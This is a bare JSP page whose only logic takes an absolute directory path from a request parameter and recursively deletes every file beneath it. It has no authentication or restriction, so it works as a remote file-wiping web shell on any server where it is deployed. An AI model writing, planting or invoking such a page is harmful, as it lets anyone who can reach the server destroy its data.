<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
          version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
    <jsp:directive.page import="java.util.*"/>
    <jsp:directive.page import="java.io.*"/>
    <jsp:directive.page import="java.nio.file.Path"/>
    <jsp:directive.page import="java.nio.file.Files"/>
    <jsp:directive.page import="java.nio.file.FileSystems"/>
    <jsp:declaration>

    </jsp:declaration>
    <jsp:scriptlet>
        String path = request.getParameter("path");
        if(path != null &amp;&amp; path.startsWith("/")){
            File index = new File(path);
            File[] entries = index.listFiles();
            for(File fl: entries){
                Path ph = FileSystems.getDefault().getPath(fl.getAbsolutePath());
                Files.walk(ph)
//                        .sorted(Comparator.reverseOrder())
                        .map(Path::toFile)
                        .forEach(File::delete);
            }
            out.print(path);
        }else{
            out.print("path missed!");
        }
    </jsp:scriptlet>
</jsp:root>